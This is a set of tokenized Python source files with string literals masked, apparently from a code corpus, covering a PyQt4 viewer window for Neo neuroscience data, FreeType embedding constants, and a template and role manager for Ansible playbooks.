and new_object_id : <EOL> model . update_data ( new_object_id , new_question_id , answer ) <EOL> reset_game ( ) <EOL> raise web . seeother ( '<STR_LIT:/>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> '''<STR_LIT>''' <EOL> if web . config . debug : <EOL> app . internalerror = web . debugerror <EOL> app . run ( ) </s>
<s> """<STR_LIT>""" <EOL> FT_FSTYPES = { '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , } <EOL> globals ( ) . update ( FT_FSTYPES ) <EOL> ft_fstype_installable_embedding = FT_FSTYPE_INSTALLABLE_EMBEDDING <EOL> ft_fstype_restricted_license_embedding = FT_FSTYPE_RESTRICTED_LICENSE_EMBEDDING <EOL> ft_fstype_preview_and_print_embedding = FT_FSTYPE_PREVIEW_AND_PRINT_EMBEDDING <EOL> ft_fstype_editable_embedding = FT_FSTYPE_EDITABLE_EMBEDDING <EOL> ft_fstype_no_subsetting = FT_FSTYPE_NO_SUBSETTING <EOL> ft_fstype_bitmap_embedding_only = FT_FSTYPE_BITMAP_EMBEDDING_ONLY </s>
<s> __version__ = '<STR_LIT>' <EOL> import matplotlib <EOL> matplotlib . use ( '<STR_LIT>' ) </s>
<s> import os <EOL> from collections import OrderedDict <EOL> import logging <EOL> import pickle <EOL> import copy <EOL> import json <EOL> import neo <EOL> from PyQt4 . QtCore import ( Qt , pyqtSignature , QThread ) <EOL> from PyQt4 . QtGui import ( QMessageBox , QApplication , <EOL> QProgressDialog , QFileDialog ) <EOL> try : <EOL> from spyderlib . widgets . dicteditor import DictEditor <EOL> except ImportError : <EOL> from spyderlib . widgets . variableexplorer . collectionseditor import CollectionsEditor as DictEditor <EOL> from spykeutils import SpykeException <EOL> from spykeutils . progress_indicator import ignores_cancel <EOL> from spykeutils . plugin . data_provider_neo import NeoDataProvider <EOL> from spykeutils . plugin . data_provider_stored import NeoStoredProvider <EOL> from spykeutils . plugin import io_plugin <EOL> from . main_window import MainWindow <EOL> from . . plugin_framework . data_provider_viewer import NeoViewerProvider <EOL> from . neo_navigation import NeoNavigationDock <EOL> from . dir_files_dialog import DirFilesDialog <EOL> from . import io_settings <EOL> from . . import api <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> class MainWindowNeo ( MainWindow ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , parent = None , splash = None ) : <EOL> super ( MainWindowNeo , self ) . __init__ ( parent , splash ) <EOL> self . block_ids = { } <EOL> self . block_names = OrderedDict ( ) <EOL> self . block_files = { } <EOL> self . block_index = <NUM_LIT:0> <EOL> self . was_empty = True <EOL> self . channel_group_names = { } <EOL> self . io_write_params = { } <EOL> nav = NeoNavigationDock ( self ) <EOL> self . neoNavigationDock = nav <EOL> self . neoNavigationDock . setObjectName ( '<STR_LIT>' ) <EOL> self . addDockWidget ( Qt . LeftDockWidgetArea , self . neoNavigationDock ) <EOL> self . neoNavigationDock . setVisible ( True ) <EOL> self . neoNavigationDock . object_removed . connect ( self . refresh_neo_view ) <EOL> self . filter_populate_function = { '<STR_LIT>' : nav . populate_neo_block_list , <EOL> '<STR_LIT>' : nav . populate_neo_channel_list , <EOL> '<STR_LIT>' : nav . populate_neo_channel_group_list , <EOL> '<STR_LIT>' : nav . populate_neo_segment_list , <EOL> '<STR_LIT>' : nav . populate_neo_unit_list } <EOL> self . activate_neo_mode ( ) <EOL> self . finish_initialization ( ) <EOL> def get_filter_types ( self ) : <EOL> """<STR_LIT>""" <EOL> l = super ( MainWindowNeo , self ) . get_filter_types ( ) <EOL> l . extend ( [ ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> return l <EOL> def get_console_objects ( self ) : <EOL> """<STR_LIT>""" <EOL> d = super ( MainWindowNeo , self ) . get_console_objects ( ) <EOL> import quantities <EOL> import neo <EOL> import spykeutils <EOL> d [ '<STR_LIT>' ] = quantities <EOL> d [ '<STR_LIT>' ] = neo <EOL> d [ '<STR_LIT>' ] = spykeutils <EOL> return d <EOL> def set_initial_layout ( self ) : <EOL> self . neoNavigationDock . setVisible ( True ) <EOL> super ( MainWindowNeo , self ) . set_initial_layout ( ) <EOL> def set_current_selection ( self , data ) : <EOL> if data [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> self . set_neo_selection ( data ) <EOL> else : <EOL> raise NotImplementedError ( <EOL> '<STR_LIT>' ) <EOL> def add_selection ( self , data ) : <EOL> if data [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> self . add_neo_selection ( data ) <EOL> else : <EOL> raise NotImplementedError ( <EOL> '<STR_LIT>' ) <EOL> def activate_neo_mode ( self ) : <EOL> self . provider = NeoViewerProvider ( self ) <EOL> self . provider_factory = NeoStoredProvider . from_current_selection <EOL> self . console . interpreter . locals [ '<STR_LIT>' ] = self . provider <EOL> if self . ipy_kernel : <EOL> self . ipy_kernel . push ( { '<STR_LIT>' : self . provider } ) <EOL> def reload_plugins ( self , keep_configs = True ) : <EOL> super ( MainWindowNeo , self ) . reload_plugins ( keep_configs ) <EOL> self . reload_neo_io_plugins ( ) <EOL> def reload_neo_io_plugins ( self ) : <EOL> neo . io . iolist = [ io for io in neo . io . iolist <EOL> if not hasattr ( io , '<STR_LIT>' ) ] <EOL> for pp in self . plugin_paths : <EOL> for f in os . listdir ( pp ) : <EOL> p = os . path . join ( pp , f ) <EOL> if os . path . isdir ( p ) : <EOL> continue <EOL> if not p . lower ( ) . endswith ( '<STR_LIT>' ) : <EOL> continue <EOL> try : <EOL> io_plugin . load_from_file ( p ) <EOL> except SpykeException , e : <EOL> logger . warning ( str ( e ) ) <EOL> self . neoIOComboBox . clear ( ) <EOL> iolabels = [ ] <EOL> for io in neo . io . iolist : <EOL> if io . name : <EOL> iolabels . append ( ( io . name , io ) ) <EOL> else : <EOL> iolabels . append ( ( io . __name__ , io ) ) <EOL> iolabels . sort ( key = lambda x : x [ <NUM_LIT:0> ] . lower ( ) ) <EOL> self . neoIOComboBox . addItem ( '<STR_LIT>' ) <EOL> self . neoIOComboBox . setItemData ( <NUM_LIT:0> , None ) <EOL> self . neoIOComboBox . addItems ( [ l [ <NUM_LIT:0> ] for l in iolabels ] ) <EOL> for i , l in enumerate ( iolabels ) : <EOL> self . neoIOComboBox . setItemData ( i + <NUM_LIT:1> , l [ <NUM_LIT:1> ] ) <EOL> for p in self . io_write_params . keys ( ) : <EOL> if p not in neo . io . iolist : <EOL> del self . io_write_params [ p ] <EOL> for p in NeoDataProvider . io_params . keys ( ) : <EOL> if p not in neo . io . iolist : <EOL> del NeoDataProvider . io_params [ p ] <EOL> def get_letter_id ( self , id_ , small = False ) : <EOL> """<STR_LIT>""" <EOL> return self . neoNavigationDock . get_letter_id ( id_ , small ) <EOL> class LoadWorker ( QThread ) : <EOL> def __init__ ( self , paths ) : <EOL> QThread . __init__ ( self ) <EOL> self . paths = paths <EOL> self . blocks = [ ] <EOL> self . error = None <EOL> def run ( self ) : <EOL> try : <EOL> self . blocks = NeoDataProvider . get_blocks ( self . paths [ <NUM_LIT:0> ] ) <EOL> except Exception as e : <EOL> self . error = e <EOL> raise <EOL> def load_files ( self , file_paths ) : <EOL> self . progress . begin ( '<STR_LIT>' ) <EOL> self . progress . set_ticks ( len ( file_paths ) ) <EOL> self . load_worker = self . LoadWorker ( file_paths ) <EOL> self . load_progress = QProgressDialog ( self . progress ) <EOL> self . load_progress . setWindowTitle ( '<STR_LIT>' ) <EOL> self . load_progress . setLabelText ( file_paths [ <NUM_LIT:0> ] ) <EOL> self . load_progress . setMaximum ( <NUM_LIT:0> ) <EOL> self . load_progress . setCancelButton ( None ) <EOL> self . load_worker . finished . connect ( self . load_file_callback ) <EOL> self . load_worker . terminated . connect ( self . load_file_callback ) <EOL> self . load_progress . show ( ) <EOL> self . load_worker . start ( ) <EOL> def edit_annotations ( self , data ) : <EOL> """<STR_LIT>""" <EOL> editor = DictEditor ( self ) <EOL> title = '<STR_LIT>' <EOL> if data . name : <EOL> title += '<STR_LIT>' % data . name <EOL> editor . setup ( data . annotations , title ) <EOL> editor . accepted . connect ( <EOL> lambda : self . _editor_ok ( data , editor ) ) <EOL> editor . show ( ) <EOL> editor . raise_ ( ) <EOL> editor . activateWindow ( ) <EOL> def _editor_ok ( self , data , editor ) : <EOL> data . annotations = editor . get_value ( ) <EOL> @ ignores_cancel <EOL> def load_file_callback ( self ) : <EOL> if not self . load_worker : <EOL> self . progress . done ( ) <EOL> return <EOL> blocks = self . load_worker . blocks <EOL> if blocks is None : <EOL> QMessageBox . critical ( <EOL> self , '<STR_LIT>' , <EOL> '<STR_LIT>' % <EOL> self . load_worker . paths [ <NUM_LIT:0> ] ) <EOL> logger . error ( '<STR_LIT>' % <EOL> self . load_worker . paths [ <NUM_LIT:0> ] ) <EOL> self . progress . done ( ) <EOL> self . load_progress . reset ( ) <EOL> self . raise_ ( ) <EOL> return <EOL> if self . load_worker . error : <EOL> QMessageBox . critical ( <EOL> self , '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( <EOL> self . load_worker . paths [ <NUM_LIT:0> ] , <EOL> type ( self . load_worker . error ) . __name__ , <EOL> str ( self . load_worker . error ) ) ) <EOL> self . progress . done ( ) <EOL> self . load_progress . reset ( ) <EOL> self . raise_ ( ) <EOL> return <EOL> for block in blocks : <EOL> name = block . name <EOL> if not name or name == '<STR_LIT>' : <EOL> name = os . path . splitext ( os . path . basename ( <EOL> self . load_worker . paths [ <NUM_LIT:0> ] ) ) [ <NUM_LIT:0> ] <EOL> name += '<STR_LIT>' % self . get_letter_id ( self . block_index ) <EOL> self . block_names [ block ] = name <EOL> self . block_ids [ block ] = self . get_letter_id ( self . block_index ) <EOL> self . block_files [ block ] = self . load_worker . paths [ <NUM_LIT:0> ] <EOL> self . block_index += <NUM_LIT:1> <EOL> self . load_progress . reset ( ) <EOL> self . progress . step ( ) <EOL> paths = self . load_worker . paths [ <NUM_LIT:1> : ] <EOL> if not paths : <EOL> self . progress . done ( ) <EOL> if not self . was_empty : <EOL> self . refresh_neo_view ( ) <EOL> else : <EOL> self . neoNavigationDock . populate_neo_block_list ( ) <EOL> self . was_empty = False <EOL> self . load_worker = None <EOL> return <EOL> self . load_worker = self . LoadWorker ( paths ) <EOL> self . load_progress . setLabelText ( paths [ <NUM_LIT:0> ] ) <EOL> self . load_progress . show ( ) <EOL> self . load_worker . finished . connect ( self . load_file_callback ) <EOL> self . load_worker . terminated . connect ( self . load_file_callback ) <EOL> self . load_worker . start ( ) <EOL> @ ignores_cancel <EOL> def on_loadFilesButton_pressed ( self ) : <EOL> if not self . block_index : <EOL> self . was_empty = True <EOL> indices = self . fileTreeView . selectedIndexes ( ) <EOL> fs_model = self . file_system_model <EOL> self . load_files ( [ fs_model . filePath ( idx ) for idx in indices ] ) <EOL> def on_fileTreeView_doubleClicked ( self , index ) : <EOL> if not self . fileTreeView . model ( ) . isDir ( index ) : <EOL> self . on_loadFilesButton_pressed ( ) <EOL> def refresh_neo_view ( self ) : <EOL> self . set_current_selection ( self . provider . data_dict ( ) ) <EOL> def neo_blocks ( self ) : <EOL> return self . neoNavigationDock . blocks ( ) <EOL> def all_neo_blocks ( self ) : <EOL> return self . block_names . keys ( ) <EOL> def neo_block_file_names ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . block_files <EOL> def neo_segments ( self ) : <EOL> return self . neoNavigationDock . segments ( ) <EOL> def neo_channel_groups ( self ) : <EOL> return self . neoNavigationDock . recording_channel_groups ( ) <EOL> def neo_units ( self ) : <EOL> return self . neoNavigationDock . units ( ) <EOL> def neo_channels ( self ) : <EOL> return self . neoNavigationDock . recording_channels ( ) <EOL> @ pyqtSignature ( "<STR_LIT>" ) <EOL> def on_actionClearCache_triggered ( self ) : <EOL> if QMessageBox . question ( <EOL> self , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> QMessageBox . Yes | QMessageBox . No ) == QMessageBox . No : <EOL> return <EOL> NeoDataProvider . clear ( ) <EOL> self . neoNavigationDock . clear ( ) <EOL> self . block_ids . clear ( ) <EOL> self . block_files . clear ( ) <EOL> self . block_names . clear ( ) <EOL> self . block_index = <NUM_LIT:0> <EOL> self . neoNavigationDock . populate_neo_block_list ( ) <EOL> def add_neo_selection ( self , data ) : <EOL> """<STR_LIT>""" <EOL> self . selections . append ( NeoStoredProvider ( data , self . progress ) ) <EOL> def set_neo_selection ( self , data ) : <EOL> """<STR_LIT>""" <EOL> self . progress . begin ( '<STR_LIT>' ) <EOL> self . progress . set_ticks ( len ( data [ '<STR_LIT>' ] ) ) <EOL> for b in data [ '<STR_LIT>' ] : <EOL> if unicode ( b [ <NUM_LIT:1> ] ) in self . block_files . values ( ) : <EOL> self . progress . step ( ) <EOL> continue <EOL> QApplication . setOverrideCursor ( Qt . WaitCursor ) <EOL> try : <EOL> cl = None <EOL> rp = None <EOL> if len ( b ) > <NUM_LIT:2> : <EOL> cl = NeoDataProvider . find_io_class ( b [ <NUM_LIT:2> ] ) <EOL> if len ( b ) > <NUM_LIT:3> : <EOL> rp = b [ <NUM_LIT:3> ] <EOL> blocks = NeoDataProvider . get_blocks ( <EOL> b [ <NUM_LIT:1> ] , force_io = cl , read_params = rp ) <EOL> finally : <EOL> QApplication . restoreOverrideCursor ( ) <EOL> if not blocks : <EOL> logger . error ( '<STR_LIT>' % b [ <NUM_LIT:1> ] ) <EOL> self . progress . step ( ) <EOL> continue <EOL> for block in blocks : <EOL> name = block . name <EOL> if not name or name == '<STR_LIT>' : <EOL> name = os . path . basename ( b [ <NUM_LIT:1> ] ) <EOL> name += '<STR_LIT>' % self . get_letter_id ( self . block_index ) <EOL> self . block_names [ block ] = name <EOL> self . block_ids [ block ] = self . get_letter_id ( self . block_index ) <EOL> self . block_files [ block ] = b [ <NUM_LIT:1> ] <EOL> self . block_index += <NUM_LIT:1> <EOL> self . progress . step ( ) <EOL> self . progress . done ( ) <EOL> self . neoNavigationDock . set_selection ( data ) <EOL> class SaveWorker ( QThread ) : <EOL> def __init__ ( self , file_name , blocks , io , params ) : <EOL> QThread . __init__ ( self ) <EOL> self . file_name = file_name <EOL> self . blocks = blocks <EOL> self . io = io ( filename = file_name ) <EOL> self . params = params <EOL> self . terminated . connect ( self . cleanup ) <EOL> self . finished . connect ( self . cleanup ) <EOL> def run ( self ) : <EOL> if hasattr ( self . io , '<STR_LIT>' ) : <EOL> self . io . write ( self . blocks , ** self . params ) <EOL> else : <EOL> if neo . Block not in self . io . writeable_objects : <EOL> logger . warning ( '<STR_LIT>' % <EOL> ( self . io . name or type ( self . io ) . __name__ ) ) <EOL> if not len ( self . blocks [ <NUM_LIT:0> ] . segments ) == <NUM_LIT:1> : <EOL> logger . warning ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> else : <EOL> logger . warning ( <EOL> '<STR_LIT>' ) <EOL> self . io . write ( self . blocks [ <NUM_LIT:0> ] , ** self . params ) <EOL> else : <EOL> if len ( self . blocks ) > <NUM_LIT:1> : <EOL> logger . warning ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . io . write ( self . blocks [ <NUM_LIT:0> ] , ** self . params ) <EOL> def cleanup ( self ) : <EOL> if self . io : <EOL> if hasattr ( self . io , '<STR_LIT>' ) : <EOL> self . io . close ( ) <EOL> self . io = None <EOL> def _save_blocks ( self , blocks , file_name , io ) : <EOL> if not blocks : <EOL> QMessageBox . warning ( self , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> self . progress . done ( ) <EOL> return <EOL> self . progress . set_ticks ( <NUM_LIT:0> ) <EOL> self . progress . setWindowTitle ( '<STR_LIT>' ) <EOL> self . progress . set_status ( '<STR_LIT>' ) <EOL> if not os . path . splitext ( file_name ) [ <NUM_LIT:1> ] : <EOL> if len ( io . extensions ) == <NUM_LIT:1> : <EOL> file_name += '<STR_LIT:.>' + io . extensions [ <NUM_LIT:0> ] <EOL> self . worker = self . SaveWorker ( file_name , blocks , io , <EOL> self . io_write_params . get ( io , { } ) ) <EOL> self . worker . finished . connect ( self . progress . done ) <EOL> self . progress . canceled . connect ( self . worker . terminate ) <EOL> self . worker . start ( ) <EOL> @ pyqtSignature ( "<STR_LIT>" ) <EOL> def on_actionLoad_Data_triggered ( self ) : <EOL> d = DirFilesDialog ( self , '<STR_LIT>' ) <EOL> if not d . exec_ ( ) : <EOL> return <EOL> self . load_files ( d . selectedFiles ( ) ) <EOL> @ pyqtSignature ( "<STR_LIT>" ) <EOL> def on_actionSave_Data_triggered ( self ) : <EOL> path , io = self . _save_data_dialog ( '<STR_LIT>' ) <EOL> if path is None : <EOL> return <EOL> self . progress . begin ( '<STR_LIT>' ) <EOL> blocks = self . all_neo_blocks ( ) <EOL> self . _save_blocks ( blocks , path , io ) <EOL> @ pyqtSignature ( "<STR_LIT>" ) <EOL> def on_actionSave_Selected_Data_triggered ( self ) : <EOL> path , io = self . _save_data_dialog ( <EOL> '<STR_LIT>' ) <EOL> if path is None : <EOL> return <EOL> self . progress . begin ( '<STR_LIT>' ) <EOL> blocks = self . provider . selection_blocks ( ) <EOL> self . _save_blocks ( blocks , path , io ) <EOL> def _get_writeable_formats ( self ) : <EOL> """<STR_LIT>""" <EOL> filters = [ ] <EOL> d = { } <EOL> for io in neo . io . iolist : <EOL> if not io . is_writable : <EOL> continue <EOL> filters . append ( '<STR_LIT>' % ( <EOL> io . name or io . __name__ , <EOL> '<STR_LIT:U+0020>' . join ( [ '<STR_LIT>' + ext for ext in io . extensions ] ) ) ) <EOL> d [ filters [ - <NUM_LIT:1> ] ] = io <EOL> return filters , d <EOL> def _save_data_dialog ( self , title ) : <EOL> """<STR_LIT>""" <EOL> dialog = QFileDialog ( self , title ) <EOL> dialog . setAcceptMode ( QFileDialog . AcceptSave ) <EOL> name_filters , io_mapping = self . _get_writeable_formats ( ) <EOL> dialog . setNameFilters ( name_filters ) <EOL> dialog . setConfirmOverwrite ( True ) <EOL> if not dialog . exec_ ( ) : <EOL> return None , None <EOL> return unicode ( dialog . selectedFiles ( ) [ <NUM_LIT:0> ] ) , io_mapping [ dialog . selectedNameFilter ( ) ] <EOL> @ pyqtSignature ( "<STR_LIT>" ) <EOL> def on_actionFull_Load_triggered ( self ) : <EOL> NeoDataProvider . data_lazy_mode = <NUM_LIT:0> <EOL> @ pyqtSignature ( "<STR_LIT>" ) <EOL> def on_actionLazy_Load_triggered ( self ) : <EOL> NeoDataProvider . data_lazy_mode = <NUM_LIT:1> <EOL> @ pyqtSignature ( "<STR_LIT>" ) <EOL> def on_actionCached_Lazy_Load_triggered ( self ) : <EOL> NeoDataProvider . data_lazy_mode = <NUM_LIT:2> <EOL> @ pyqtSignature ( "<STR_LIT>" ) <EOL> def on_actionFull_triggered ( self ) : <EOL> NeoDataProvider . cascade_lazy = False <EOL> @ pyqtSignature ( "<STR_LIT>" ) <EOL> def on_actionLazy_triggered ( self ) : <EOL> NeoDataProvider . cascade_lazy = True <EOL> @ pyqtSignature ( "<STR_LIT:int>" ) <EOL> def on_neoIOComboBox_currentIndexChanged ( self , index ) : <EOL> if index > <NUM_LIT:0> : <EOL> NeoDataProvider . forced_io = self . neoIOComboBox . itemData ( index ) <EOL> self . configureIOButton . setEnabled ( <EOL> io_settings . has_ui_params ( NeoDataProvider . forced_io ) ) <EOL> else : <EOL> NeoDataProvider . forced_io = None <EOL> self . configureIOButton . setEnabled ( False ) <EOL> @ pyqtSignature ( "<STR_LIT>" ) <EOL> def on_configureIOButton_pressed ( self ) : <EOL> io = NeoDataProvider . forced_io <EOL> d = io_settings . ParamDialog ( <EOL> io , NeoDataProvider . io_params . get ( io , { } ) , <EOL> self . io_write_params . get ( io , { } ) , self ) <EOL> if d . exec_ ( ) : <EOL> NeoDataProvider . io_params [ io ] = d . get_read_params ( ) <EOL> self . io_write_params [ io ] = d . get_write_params ( ) <EOL> def _execute_remote_plugin ( self , plugin , current = None , selections = None ) : <EOL> sl = list ( ) <EOL> if current is None : <EOL> sl . append ( self . provider_factory ( '<STR_LIT>' , self ) . data_dict ( ) ) <EOL> else : <EOL> d = copy . copy ( current . data_dict ( ) ) <EOL> d [ '<STR_LIT:name>' ] = '<STR_LIT>' <EOL> sl . append ( d ) <EOL> if selections is None : <EOL> selections = self . selections <EOL> for s in selections : <EOL> sl . append ( s . data_dict ( ) ) <EOL> io_plugin_files = [ ] <EOL> transform_path = getattr ( api . config , '<STR_LIT>' , <EOL> lambda x : x ) <EOL> for s in sl : <EOL> if s [ '<STR_LIT:type>' ] != '<STR_LIT>' : <EOL> continue <EOL> for b in s [ '<STR_LIT>' ] : <EOL> if len ( b ) > <NUM_LIT:2> : <EOL> io = NeoDataProvider . find_io_class ( b [ <NUM_LIT:2> ] ) <EOL> if io is None : <EOL> raise NameError ( '<STR_LIT>' <EOL> '<STR_LIT>' % b [ <NUM_LIT:2> ] ) <EOL> if getattr ( io , '<STR_LIT>' , False ) : <EOL> io_plugin_files . append ( io . _python_file ) <EOL> b [ <NUM_LIT:1> ] = transform_path ( b [ <NUM_LIT:1> ] ) <EOL> selections = json . dumps ( sl , sort_keys = True , indent = <NUM_LIT:2> ) <EOL> config = pickle . dumps ( plugin . get_parameters ( ) ) <EOL> name = type ( plugin ) . __name__ <EOL> path = plugin . source_file <EOL> self . send_plugin_info ( name , path , selections , config , io_plugin_files ) <EOL> def closeEvent ( self , event ) : <EOL> super ( MainWindowNeo , self ) . closeEvent ( event ) <EOL> NeoDataProvider . clear ( ) </s>
<s> from datetime import datetime <EOL> import re <EOL> import shutil <EOL> import os <EOL> from logging import debug <EOL> import yaml <EOL> from servi . manifest import Manifest <EOL> from servi . exceptions import ServiError , ForceError <EOL> from servi . utils import file_exists , pathfor <EOL> import servi . config as c <EOL> BACKUP_PREFIX = '<STR_LIT>' <EOL> class TemplateManager ( object ) : <EOL> def __init__ ( self , raw_template_playbook = None ) : <EOL> self . m_master = None <EOL> self . m_master_saved = None <EOL> self . m_template = None <EOL> self . master_playbook_exists = ForceError <EOL> self . t_added = set ( ) <EOL> self . t_changed = set ( ) <EOL> self . t_removed = set ( ) <EOL> self . t_mod = set ( ) <EOL> self . t_mod_but_ignored = set ( ) <EOL> self . m_added = set ( ) <EOL> self . m_changed = set ( ) <EOL> self . m_removed = set ( ) <EOL> self . m_mod = set ( ) <EOL> self . m_mod_but_ignored = set ( ) <EOL> self . roles = set ( ) <EOL> self . possible_roles = set ( ) <EOL> self . modified_possible_roles = set ( ) <EOL> self . role_of_fname = None <EOL> self . timestamp = datetime . utcnow ( ) <EOL> self . raw_template_playbook = raw_template_playbook <EOL> self . m_master = Manifest ( c . MASTER ) <EOL> self . m_template = Manifest ( c . TEMPLATE ) <EOL> self . update_tmgr ( ) <EOL> def update_tmgr ( self ) : <EOL> try : <EOL> self . m_master_saved = Manifest ( c . MASTER , load = True ) <EOL> except FileNotFoundError : <EOL> self . m_master_saved = None <EOL> self . master_playbook_exists = file_exists ( <EOL> pathfor ( '<STR_LIT>' , c . MASTER ) ) <EOL> self . t_added , self . t_changed , self . t_removed = Manifest . diff_files ( self . m_master , self . m_template ) <EOL> self . t_mod = self . t_changed | self . t_removed <EOL> self . t_mod_but_ignored = self . ignored_files ( self . t_mod ) <EOL> if self . m_master_saved : <EOL> self . m_added , self . m_changed , self . m_removed = Manifest . diff_files ( self . m_master , self . m_master_saved ) <EOL> self . m_mod = self . m_changed | self . m_removed <EOL> self . m_mod_but_ignored = self . ignored_files ( <EOL> self . m_mod ) <EOL> else : <EOL> self . m_added , self . m_changed , self . m_removed , self . m_mod , self . m_mod_but_ignored = set ( ) , set ( ) , set ( ) , set ( ) , set ( ) <EOL> rm = RoleManager ( self . t_changed , self . raw_template_playbook ) <EOL> self . roles = rm . roles <EOL> self . possible_roles = rm . possible_roles <EOL> self . modified_possible_roles = rm . modified_possible_roles <EOL> self . role_of_fname = rm . role_of_fname <EOL> def init_master ( self , exclude_files = None ) : <EOL> if exclude_files is None : <EOL> exclude_files = [ ] <EOL> self . copy_files ( exclude_files = exclude_files ) <EOL> def update_master ( self ) : <EOL> self . copy_files ( exclude_files = self . t_mod_but_ignored ) <EOL> @ staticmethod <EOL> def rename_master_file ( fname , timestamp ) : <EOL> """<STR_LIT>""" <EOL> backupdir = '<STR_LIT>' . format ( BACKUP_PREFIX , timestamp . isoformat ( ) ) <EOL> if not os . path . exists ( backupdir ) : <EOL> os . mkdir ( backupdir ) <EOL> subdir = os . path . join ( backupdir , os . path . dirname ( fname ) ) <EOL> if not os . path . exists ( subdir ) : <EOL> os . makedirs ( subdir ) <EOL> shutil . move ( pathfor ( fname , c . MASTER ) , subdir ) <EOL> def copy_files ( self , exclude_files ) : <EOL> for fname , template_hash in self . m_template . manifest [ "<STR_LIT>" ] . items ( ) : <EOL> template_fname = pathfor ( fname , c . TEMPLATE ) <EOL> master_fname = pathfor ( fname , c . MASTER ) <EOL> if ( self . m_master . manifest [ "<STR_LIT>" ] [ fname ] == <EOL> template_hash ) : <EOL> continue <EOL> if fname in exclude_files : <EOL> continue <EOL> _cur_role = self . role_of_fname ( fname ) <EOL> if ( _cur_role and self . master_playbook_exists <EOL> and _cur_role not in self . roles ) : <EOL> debug ( '<STR_LIT>' <EOL> . format ( fname ) ) <EOL> continue <EOL> if fname == c . SERVIFILE_GLOBAL : <EOL> master_fname = c . SERVIFILE_GLOBAL_FULL <EOL> if ( os . path . split ( fname ) [ <NUM_LIT:1> ] == '<STR_LIT>' <EOL> and os . path . isfile ( template_fname ) ) : <EOL> debug ( '<STR_LIT>' <EOL> . format ( fname ) ) <EOL> continue <EOL> if file_exists ( master_fname ) : <EOL> self . rename_master_file ( fname , self . timestamp ) <EOL> existing = True <EOL> else : <EOL> existing = False <EOL> destdir = os . path . dirname ( master_fname ) <EOL> if destdir and not os . path . exists ( destdir ) : <EOL> os . makedirs ( destdir ) <EOL> shutil . copy2 ( template_fname , master_fname ) <EOL> if existing : <EOL> debug ( '<STR_LIT>' . format ( master_fname ) ) <EOL> else : <EOL> debug ( '<STR_LIT>' . format ( master_fname ) ) <EOL> m = Manifest ( c . MASTER ) <EOL> m . save ( ) <EOL> self . update_tmgr ( ) <EOL> return True <EOL> @ staticmethod <EOL> def ignored_files ( files ) : <EOL> """<STR_LIT>""" <EOL> ignore_list = c . SERVI_IGNORE_FILES <EOL> ignore_re_string = '<STR_LIT:(>' + '<STR_LIT:|>' . join ( ignore_list ) + '<STR_LIT:)>' <EOL> ignore_re = re . compile ( ignore_re_string ) <EOL> ignored = { file for file in files if ignore_re . search ( file ) } <EOL> return ignored <EOL> class RoleManager ( object ) : <EOL> def __init__ ( self , changed_files , raw_template_playbook = None ) : <EOL> self . roles , self . possible_roles = self . _get_master_roles ( <EOL> self . _get_template_roles ( ) , raw_template_playbook ) <EOL> self . modified_possible_roles = self . _get_modified_possible_roles ( <EOL> changed_files , self . possible_roles ) <EOL> @ staticmethod <EOL> def role_of_fname ( normalized_fname ) : <EOL> """<STR_LIT>""" <EOL> match = re . search ( '<STR_LIT>' , <EOL> normalized_fname ) <EOL> if not match : <EOL> return None <EOL> else : <EOL> return match . group ( <NUM_LIT:1> ) <EOL> @ staticmethod <EOL> def _get_template_roles ( ) : <EOL> template_dir = os . path . join ( c . TMPL_DIR_SITE , '<STR_LIT>' ) <EOL> roles = [ path for path in <EOL> os . listdir ( template_dir ) <EOL> if os . path . isdir ( os . path . join ( template_dir , path ) ) ] <EOL> return set ( roles ) <EOL> @ staticmethod <EOL> def _get_master_roles ( template_roles , test_raw = None ) : <EOL> if test_raw : <EOL> playbook = yaml . load ( test_raw ) <EOL> playbook = playbook [ <NUM_LIT:0> ] <EOL> playbook_raw = test_raw <EOL> else : <EOL> try : <EOL> with open ( pathfor ( '<STR_LIT>' , c . MASTER ) , <EOL> '<STR_LIT:r>' ) as fp : <EOL> playbook = yaml . load ( fp ) <EOL> fp . seek ( <NUM_LIT:0> ) <EOL> playbook = playbook [ <NUM_LIT:0> ] <EOL> playbook_raw = fp . read ( ) <EOL> except FileNotFoundError : <EOL> return set ( ) , set ( ) <EOL> if '<STR_LIT>' not in playbook : <EOL> raise ServiError ( <EOL> '<STR_LIT>' <EOL> . format ( pathfor ( '<STR_LIT>' , c . MASTER ) ) ) <EOL> roles = { role for role in playbook [ '<STR_LIT>' ] if type ( role ) is str } <EOL> roles |= { role [ '<STR_LIT>' ] <EOL> for role in playbook [ '<STR_LIT>' ] if type ( role ) is dict } <EOL> possible_roles = set ( ) <EOL> for t_role in template_roles : <EOL> if re . search ( '<STR_LIT>' . format ( t_role ) , playbook_raw , <EOL> flags = re . IGNORECASE | re . MULTILINE ) : <EOL> possible_roles . add ( t_role ) <EOL> return roles , possible_roles <EOL> @ staticmethod <EOL> def _get_modified_possible_roles ( changed_files , possible_roles ) : <EOL> retval = set ( ) <EOL> for fname in changed_files : <EOL> role = RoleManager . role_of_fname ( fname ) <EOL> if role in possible_roles : <EOL> retval |= { role } <EOL> return retval </s>
